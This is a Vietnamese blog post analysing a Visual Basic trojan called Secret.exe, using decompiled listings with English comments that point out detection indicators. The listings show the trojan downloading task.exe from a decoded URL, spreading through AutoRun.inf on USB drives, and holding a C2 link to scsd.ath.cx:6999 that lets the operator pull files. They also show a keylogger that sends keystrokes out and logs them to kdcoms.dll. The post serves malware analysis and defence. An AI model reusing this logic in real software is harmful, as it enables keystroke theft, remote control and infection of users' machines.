Wednesday 9 June 2010

@Virus Secret.exe (PhimNguoiLon)

Thật đáng thất vọng, DungCoi tiếp xúc với ít nhất 4 biến thể của virus này, mà cũng chẳng thay đổi bao nhiêu.
Tác giả nó chỉ ăn lui ăn lại một thứ mà ko chán nhỉ ?
-
Dùng VB Decompiler thì nhận ra một số đoạn đáng chú ý sau :

Project gồm 2 form : Form1 và Form2

Form 1 gồm :
Các thao tác hoạt động cơ bản của virus

' Day-gated trigger. global_88 holds a day name (it is compared with "Saturday" / "Tuesday").
' On those days Timer4 (see Timer4_Timer further down) is armed only when the
' "...\kdcoms32.dll" path does not exist yet. Unknown_40F1FC is used as a file-existence
' check throughout this dump and Unknown_40F54C as a path helper (both inferred from how
' their results are used, not from their bodies -- confirm before relying on it).
loc_412533: If CBool((Me.global_88 = "Saturday") Or (Me.global_88 = "Tuesday")) Then '412595
loc_412544: var_AC = CVar(Unknown_40F54C(Me.global_88, CLng(Me.global_72), &H0, &H0, Me.global_72, "", "", "", "") & "\kdcoms32.dll") 'String
loc_412553: If Not (Unknown_40F1FC(var_AC)) Then '41256C
' Arming Timer4 hands control to Timer4_Timer on its next tick (the author reads this as the update path).
loc_412564: Timer4.Enabled = &HFF
loc_41256C: End If

Thứ 7 hoặc thứ 3 sẽ tiến hành cho Timer4 làm việc (Update virus)

' String literals and registry writes recovered by the decompiler. &H80000002 is the
' HKEY_LOCAL_MACHINE root, and Winlogon\Shell plus Winlogon\Userinit are the classic
' logon-time persistence values. The values written here ("Explorer.exe" and
' "<dir>\system32\userinit.exe,") look like the Windows defaults, so this may be resetting
' rather than hijacking them; the decompiler mangled the call form ("&H80000002 = ...") so
' the exact intent cannot be confirmed from this excerpt. Any write to these two values by a
' non-installer process is worth alerting on regardless.
loc_40F2B1: LitStr "\userinit.exe"
....
loc_40F2C2: LitStr "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
' "\system32\system.exe" is referenced, but where it is used is not visible in this excerpt.
loc_410A66: LitStr "\system32\system.exe"
loc_41207D: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe", &H0)
loc_4120B7: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", Unknown_40F54C() & "\system32\userinit.exe,")

' Start-up handling of "...\kdcoms.dll". Further down (Timer2_Timer) this same file is
' opened For Append and receives the captured input, i.e. it is the on-disk keystroke log.
' If it already exists, two unresolved helpers (ext_401090, then ext_401030) are applied to
' it; what they do is not recoverable from the dump (the same pair is used on AutoRun.inf
' before it is rewritten, which suggests a clear/delete step -- unconfirmed).
loc_4121A3: var_AC = CVar(Unknown_40F54C("") & "\kdcoms.dll") 'String
loc_4121B1: If Unknown_40F1FC(var_AC) Then '4121FA
loc_4121CD: var_C8 = Unknown_40F54C() & "\kdcoms.dll"
loc_4121D0: ext_401090
loc_4121EC: var_AC = CVar(Unknown_40F54C("", &H0) & "\kdcoms.dll") 'String
loc_4121EF: ext_401030
loc_4121FA: End If

' Timer4_Timer: one-shot tick -- the timer disables itself on entry. It runs only when
' "...\kdcoms32.dll" exists. The embedded URL is recovered with Decode(..., &H9): one string
' on Tuesday, another on every other day. The destination built in both branches is
' "<dir>\system32\task.exe", and DL1.Address_4165C0 is called after each -- presumably the
' download routine, inferred only from the URL/destination pairing. The first string decodes
' to the files.myopera.com URL the author prints below; the second is decoded the same way.
' The encoded literals as rendered here contain a stray space / control characters, so
' the blog rendering may have altered them. Detection points: egress to that host and the
' appearance of system32\task.exe.
Private Sub Timer4_Timer() '4101D0
'Data Table: 40BD20
loc_4100D4: On Error GoTo 0
loc_4100E5: Timer4.Enabled = &H0
loc_4100FB: var_9C = CVar(Unknown_40F54C() & "\kdcoms32.dll") 'String
loc_410109: If Unknown_40F1FC(var_9C) Then '4101CA
loc_41011C: If (Me.global_88 = "Tuesday") Then '410174
loc_41014A: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8qjhxwurwn8orun|8}j|t7{j{", &H9))) & "\system32\task.exe") 'String
loc_410158: Call var_88.DL1.Address_4165C0
loc_410171: GoTo loc_4101C8
loc_410174: End If
' Non-Tuesday branch: different encoded source, same destination and same helper.
loc_4101A1: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8yq~xwp6qxwp8orun|8}j|t7{j{", &H9)), var_C8) & "\system32\task.exe") 'String
loc_4101AF: Call var_88.DL1.Address_4165C0
loc_4101C8: ' Referenced from: 410171
loc_4101CA: End If
loc_4101CE: Exit Sub
End Sub


Function Decode :
' Decompiled form of the string decoder. The decompiler apparently lost the Mid$/Asc/Chr
' calls (they surface as ext_401018 / ext_401004 / ext_401054) and the accumulator
' assignment (var_94 & CStr("")); only the loop, the Depth normalisation (0 -> &H28, cap at
' 254) and the "+255" wrap survive intact. The clean source the author matched it to is
' reproduced below this block.
Public Function Decode(Data, Depth) '40FD1C
'Data Table: 40BD20
loc_40FC5A: On Error GoTo 0
loc_40FC69: For var_9A = &H1 To CInt(Len(Data)): var_96 = var_9A 'Integer
loc_40FC71: var_BC = 1
loc_40FC82: var_8C = ext_401018
loc_40FC92: var_8E = ext_401004
' Depth normalisation: 0 becomes &H28 (40), anything above 254 is capped at 254.
loc_40FC9D: If (Depth = &H0) Then '40FCA7
loc_40FCA4: Depth = &H28
loc_40FCA7: End If
loc_40FCB0: If (Depth > 254) Then '40FCBB
loc_40FCB8: Depth = 254
loc_40FCBB: End If
' Wrap on underflow adds 255, not 256 -- same quirk as the clean source below.
loc_40FCCF: If ((var_8E - Depth) < &H0) Then '40FCDE
loc_40FCDB: var_8E = (var_8E + 255)
loc_40FCDE: End If
loc_40FCE7: ext_401054
loc_40FCFF: var_94 = var_94 & CStr("")
loc_40FD07: Next var_9A 'Integer
loc_40FD11: var_88 = var_94
loc_40FD16: Result = arg_14: Exit Sub
End Function


Nếu bạn đã từng đọc qua Function này ở Source nào đó thì bạn sẽ nhận ra ngay đoạn code gốc :

' Decode -- the clean VB6 source of the string decoder above.
' Walks Data one character at a time and subtracts Depth from each ANSI code; a negative
' result is pulled back up by 255 (not 256 -- left exactly as written, the decoded URL
' printed below depends on this arithmetic). Depth is normalised on every pass: 0 (the
' Optional default) becomes 40 and anything above 254 is capped at 254. Depth is passed
' ByRef (VB6 default), so that normalisation is visible to the caller -- but only when Data
' is non-empty, which is why the check stays inside the loop.
' Returns the shifted string; empty Data returns "".
Public Function Decode(Data As String, Optional Depth As Integer) As String
    Dim pos As Integer
    Dim code As Integer
    Dim plain As String

    For pos = 1 To Len(Data)
        Select Case Depth
            Case 0
                Depth = 40
            Case Is > 254
                Depth = 254
        End Select
        code = Asc(Mid$(Data, pos, 1)) - Depth
        If code < 0 Then code = code + 255
        plain = plain & Chr$(code)
    Next pos

    Decode = plain
End Function


Kết quả giải mã String : q}}yC88orun|7v‚xyn{j7lxv8qjhxwurwn8orun|8}j|t7{j{ → "http://files.myopera.com/hav_online/files/task.rar"

' Removable-media spreading. var_DC holds a drive root; the comparisons against "A" and "B"
' presumably skip the floppy letters (inferred from the literals only). If "Secret.exe" is
' not already on the drive, the running image (App.Path & App.EXEName & ".exe") is paired
' with "<drive>\Secret.exe" and handed to ext_401070 -- a copy helper, inferred from that
' pairing. An existing AutoRun.inf goes through the same ext_401090 / ext_401030 pair used on
' kdcoms.dll at start-up (clear/delete, unconfirmed) and is then rewritten with the lines
' printed below, so that opening or exploring the drive launches Secret.exe.
' Detection / mitigation: the exact AutoRun.inf text below is a reliable file signature, and
' disabling AutoRun/AutoPlay for removable media blocks this path entirely.
loc_41141B: var_1AC = var_17C And (var_17C <> "A")
loc_41142A: ext_401088
loc_411435: ext_40102C
loc_41145A: If CBool(var_1CC And (var_1CC <> "B")) Then '411B9C
loc_411461: var_86 = &HFF
loc_411477: var_15C = var_DC & "\" & "Secret.exe"
loc_41147F: VarLateMemCallLdVar
' var_9C is the existence result for "<drive>\Secret.exe" (inferred from the late-bound call above).
loc_411496: If CBool(Not var_9C) Then '41154F
loc_4114E2: var_21C = CStr(var_DC & "\" & "Secret.exe")
loc_4114FB: var_218 = App.Path & "\" & App.EXEName & ".exe"
loc_4114FE: ext_401070
loc_41153C: var_204 = CStr(var_DC & "\" & "Secret.exe")
loc_411540: ext_401090
loc_41154F: End If
loc_41155B: var_12C = var_DC & "\AutoRun.inf"
loc_411563: VarLateMemCallLdVar
loc_411574: If CBool(var_9C) Then '4115AF
loc_41158A: var_204 = CStr(var_DC & "\AutoRun.inf")
loc_41158E: ext_401090
loc_4115A3: var_12C = var_DC & "\AutoRun.inf"
loc_4115A7: ext_401030
loc_4115AF: End If
' Rewrite of AutoRun.inf: "open=" plus shell\open and shell\explore commands all point at Secret.exe.
loc_4115C7: Open CStr(var_DC & "\AutoRun.inf") For Output As &H1 Len = &HFF
loc_4115D8: Print &H1, "[AutoRun]"
loc_4115E5: Print &H1, "open=Secret.exe"
loc_4115F2: Print &H1, ";shell\open=Open(&O)"
loc_4115FF: Print &H1, "shell\open\Command=Secret.exe"
loc_41160C: Print &H1, "shell\open\Default=1"
loc_411619: Print &H1, ";shell\explore=Manager(&X)"
loc_411626: Print &H1, "shell\explore\Command=Secret.exe"
loc_411630: Close &H1
loc_411645: var_204 = CStr(var_DC & "\AutoRun.inf")


Ghi file AutoRun.inf và Secret.exe vào đĩa USB.

Module1 :
Cho thấy các thao tác KeyLog.

' init (Module1): drops the embedded Winsock control the trojan depends on.
' If "<dir>\system32\MSWINSCK.OCX" is missing, it is written out from resource 101
' ("CUSTOM") and a silent registration command ("Regsvr32 ... /s") is assembled into var_CC;
' the call that actually launches it is not explicit in this dump (ext_40103C is the only
' candidate and it precedes the string in the listing). "%x2" is decompiler residue, not
' source. Load MemVar_416064 afterwards loads a form (inferred from the Load statement).
' Detection: MSWINSCK.OCX being written to system32, and regsvr32 /s run on it, by a
' non-installer process.
Public Sub init() '410078
'Data Table: 40BD20
loc_40FFA0: On Error GoTo 0
loc_40FFB1: var_98 = CVar(Unknown_40F54C() & "\system32\MSWINSCK.OCX") 'String
loc_40FFC0: If Not (Unknown_40F1FC(var_98)) Then '410056
' Resource 101 of type "CUSTOM" is the raw OCX image (grounded in the Put of LoadResData below).
loc_410006: Open Unknown_40F54C() & "\system32\MSWINSCK.OCX" For Binary As &H1 Len = &HFF
loc_41001D: Put &H1, &H1, LoadResData(101, "CUSTOM")
loc_410025: Close &H1
loc_410044: ext_40103C
loc_410049: var_CC = CVar(%x2 & Unknown_40F54C("Regsvr32", &H2) & "\system32\MSWINSCK.OCX /s")
loc_410056: End If
loc_41006A: Load MemVar_416064
loc_410074: Exit Sub
End Sub


Ghi đè MSWINSCK.OCX bằng Data trong Resource

Form2 gồm : Các lệnh điều khiển Trojan
' Timer1_Timer (Form2): C2 connection keeper. "@filesize@" is the decompiler's label for a
' property of var_88 (the Winsock control, inferred); the compared value 7 matches the
' Winsock control's sckConnected state, so the block reads as "if not connected, reconnect":
' Address_40D1F0 (close, inferred), then host "scsd.ath.cx" and port 6999, then
' Address_40D1E0 (connect, inferred). The final line re-enables var_88.Timer rather than
' Timer1 itself -- possibly another decompiler artifact.
' Detection: DNS resolution of scsd.ath.cx and outbound TCP/6999 from a user-level process.
Private Sub Timer1_Timer() '40F884
'Data Table: 40B764
loc_40F7F4: On Error GoTo 0
loc_40F805: Timer1.Enabled = &H0
loc_40F819: var_98 = var_88.@filesize@
loc_40F82A: If (CInt(var_98) <> &H7) Then '40F867
loc_40F839: call var_88..Address_40D1F0
' C2 endpoint: the two values below are the network indicators for this sample.
loc_40F846: var_A8 = "scsd.ath.cx"
loc_40F84C: var_C8 = 6999
loc_40F85C: call var_88..Address_40D1E0
loc_40F867: End If
loc_40F877: var_88.Timer.Enabled = &HFF
loc_40F881: Exit Sub
End Sub


Kết nối tới Server qua tên máy chủ và cổng ở trên.

' ws_ : command dispatcher for data arriving on the socket (the sub name is truncated by the
' decompiler; the received text is read through Address_40BA0C / ext_401048). Note the first
' InStr searches "" instead of var_88 -- a decompiler slip, the other three search var_88.
' Recognised C2 tokens:
'   @chdirec@  set Dir1/File1 to the supplied path, then sendinfo (listing sent back)
'   @chdrv@    same flow for a drive change
'   @sendfile@ set global_72 (transfer in progress), open the supplied path For Binary, SendFile
'   @cancel@   set global_104 (abort flag, inferred)
' The @sendfile@ path opens whatever path the peer supplies with no restriction, i.e. any
' readable file can be pulled from the host. Detection: these literal tokens in cleartext
' traffic on the C2 port are a usable content signature.
Private Sub ws_() '410D48
'Data Table: 40B764
loc_410B14: On Error GoTo 0
loc_410B32: Call var_9C.ws.Address_40BA0C
loc_410B57: If (InStr(&H1, "", "@chdirec@", &H0) <> &H0) Then '410BED
loc_410B79: var_88 = ext_401048
loc_410B81: ext_401050
loc_410B8E: ext_401068
loc_410BA4: Dir1.Path = CStr(var_BC)
loc_410BBE: ext_401068
loc_410BD4: File1.Path = CStr(var_BC)
loc_410BE8: Call sendinfo
loc_410BED: End If
loc_410C09: If (InStr(&H1, var_88, "@chdrv@", &H0) <> &H0) Then '410C9F
loc_410C2B: var_88 = ext_401048
loc_410C33: ext_40105C
loc_410C40: ext_401068
loc_410C56: Dir1.Path = CStr(var_BC)
loc_410C70: ext_401068
loc_410C86: File1.Path = CStr(var_BC)
loc_410C9A: Call sendinfo
loc_410C9F: End If
loc_410CBB: If (InStr(&H1, var_88, "@sendfile@", &H0) <> &H0) Then '410D1B
' global_72 = True blocks the keystroke sender in Timer2_Timer while the transfer runs.
loc_410CC6: Me.global_72 = True
loc_410CEF: Me.global_52 = CVar(ext_401048)
loc_410CFA: Close &H1
loc_410D0D: Open CStr(Me.global_52) For Binary As &H1 Len = &HFF
loc_410D16: Call SendFile
loc_410D1B: End If
loc_410D37: If (InStr(&H1, var_88, "@cancel@", &H0) <> &H0) Then '410D44
loc_410D41: Me.global_104 = &HFF
loc_410D44: End If
loc_410D46: Exit Sub
End Sub


Virus sử dụng Control MSWINSCK.OCX đã trích xuất ở trên để chờ nhận các gói tin và trả lời các gói tin đó.

' Timer2_Timer (Form2): keystroke collection and flushing. Each tick extends global_68 with
' the output of Unknown_414E84 (the capture helper the author points at below). Three flush
' paths share one guard: if the socket state is 7 (sckConnected, by the Winsock control's
' constants) and no file transfer is running (global_72 = False), the text is sent prefixed
' with "@yahoo@"; in every case it is also appended to "<dir>\kdcoms.dll", the on-disk log.
'   1. MemVar_416040 is non-empty and longer than 2 chars (a second buffer whose origin is
'      not visible in this excerpt)
'   2. global_68 contains "@enter@" (Enter pressed): re-read via ext_401048, flush if non-empty
'   3. global_68 is longer than &H37 (55) characters
' Detection: steady growth of kdcoms.dll, and the "@yahoo@" prefix in outbound traffic.
Private Sub Timer2_Timer() '411044
'Data Table: 40B764
loc_410D90: On Error GoTo 0
loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)
loc_410DCA: If ((MemVar_416040 <> "") And (Len(MemVar_416040) > &H2)) Then '410E70
loc_410E07: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410E2F
loc_410E13: var_A0 = CVar("@yahoo@" & MemVar_416040) 'String
loc_410E21: call var_90..Address_0
loc_410E2F: End If
loc_410E46: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_410E58: Print &H2, MemVar_416040
loc_410E62: Close &H2
loc_410E6F: Exit Sub
loc_410E70: End If
loc_410E8F: If (InStr(&H1, Me.global_68, "@enter@", &H0) <> &H0) Then '410F7F
loc_410EBA: Me.global_68 = ext_401048
loc_410ECE: If (Me.global_68 <> "") Then '410F7A
loc_410F0B: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410F36
loc_410F1A: var_A0 = CVar("@yahoo@" & Me.global_68) 'String
loc_410F28: call var_90..Address_0
loc_410F36: End If
' The extra arguments on this Unknown_40F54C call are decompiler noise; the target file is the same kdcoms.dll.
loc_410F4D: Open Unknown_40F54C("", Me.global_68, "@enter@", "", &H1, &HFFFFFFFF, &H1) & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_410F62: Print &H2, Me.global_68
loc_410F6C: Close &H2
loc_410F7A: End If
loc_410F7E: Exit Sub
loc_410F7F: End If
loc_410F90: If (Len(Me.global_68) > &H37) Then '41103C
loc_410FCD: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410FF8
loc_410FDC: var_A0 = CVar("@yahoo@" & Me.global_68) 'String
loc_410FEA: call var_90..Address_0
loc_410FF8: End If
loc_41100F: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_411024: Print &H2, Me.global_68
loc_41102E: Close &H2
loc_41103C: End If
loc_411040: Exit Sub
End Sub


Sau mỗi thao tác Enter sẽ ghi thêm thông tin nhập trước đó vào file kdcoms.dll


Module1 :
Hàm đặt KeyLog được gọi ở Form2 qua lệnh sau :
' The capture call the author singles out: on every Timer2 tick global_68 is rebuilt from
' Unknown_414E84's result ("%x2" is decompiler residue). Its body lives in Module1, outside this excerpt.
loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)

Nguồn: http://virusvn.com/forum/showthread.php?t=319
